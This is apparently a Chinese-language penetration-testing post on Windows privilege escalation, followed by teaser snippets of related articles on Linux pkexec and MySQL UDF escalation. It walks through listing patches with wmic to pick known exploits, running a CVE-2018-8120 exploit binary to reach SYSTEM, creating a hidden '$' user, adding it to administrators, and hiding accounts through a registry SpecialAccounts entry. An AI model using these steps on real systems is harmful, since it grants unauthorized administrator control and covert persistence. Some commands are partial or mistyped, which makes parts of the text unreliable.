1.github**,截圖,不同系統版本對應的漏洞
2.後滲透階段
裡面大部分是基於x64系統的漏洞直接利用程式exe,傻瓜式操作,一鍵提權
c:\users\knownsec.zyg>
c:\users\knownsec.zyg>***x.exe "whoami"
c:\users\knownsec.zyg>
粘乙個大佬分享的截圖:
提權前若是能夠檢視該系統的補丁那是更美妙的事情了:
c:\users\knownsec.zyg>systeminfo
c:\users\knownsec.zyg>wmic qfe list full /format:htable >c:\users\knownsec.zyg\desktop\hotfixes.htm
這個命令會匯出乙個html,裡面存放了每乙個補丁安裝的時間,由此可以推測該系統最後乙個補丁的時間,查詢1day提權漏洞
若是已經發現合適的漏洞並對其進行利用的話,成功效果圖如下:
這便是利用cve-2018-8120的x86版指令碼直接提權,「whoami」後返回當前使用者顯示已經為「system」
思路:基於system的dos建立隱藏使用者,將隱藏使用者加入administrators使用者組以獲得管理員許可權
c:\users\knownsec.zyg>***x.exe "net user" #檢視當前所有使用者
c:\users\knownsec.zyg>***x.exe "net user 使用者名稱$ 密碼 /add" #新增該使用者
c:\users\knownsec.zyg>***x.exe "net localgroup administrastors username /add"
#將該使用者拉入管理員組以獲得管理員許可權
c:\users\knownsec.zyg>***x.exe "net user" #檢視使用者發現沒有該隱藏使用者
或者再:
用記事本建個文字檔案,輸入以下內容(使用者名稱自行修改),另存為.reg登錄檔檔案後雙擊匯入即可:二合一食用效果更windows registry editor version 5.00
[hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist]
"隱藏使用者名稱1"=dword:00000000
"隱藏使用者名稱2"=dword:00000000
漏洞總結 linux提權漏洞
此漏洞只能在使用了pkexec驗證程式的系統中可以提權成功。受影響的系統 ubuntu 16.04.5 kernel 4.15.0 29 generic ubuntu 18.04.1 kernel 4.15.0 20 generic ubuntu 19.04 kernel 5.0.0 15 gene...
漏洞復現 Mysql UDF提權
udf user defined function 即使用者自定義函式。是通過新增新函式,對mysql的功能進行擴充,其實就像使用本地mysql函式如 user 或 concat 等。那麼我們該如何使用udf檔案呢?在mysql預設安裝的裡面是不存在這個檔案的。那麼如果假設該檔案存在被攻擊者上傳到路...
windows基礎提權
提到system許可權 甚至讓他變成你的肉雞 我們了解一下windows下面有那些使用者 guests是使用者最低的許可權 而且一般是被禁用的 user許可權也很低 連關機都不行 還有window系統內建使用者組 只對本站的主目錄有讀寫修改的許可權 net user 顯示你當前系統有那些使用者賬號 ...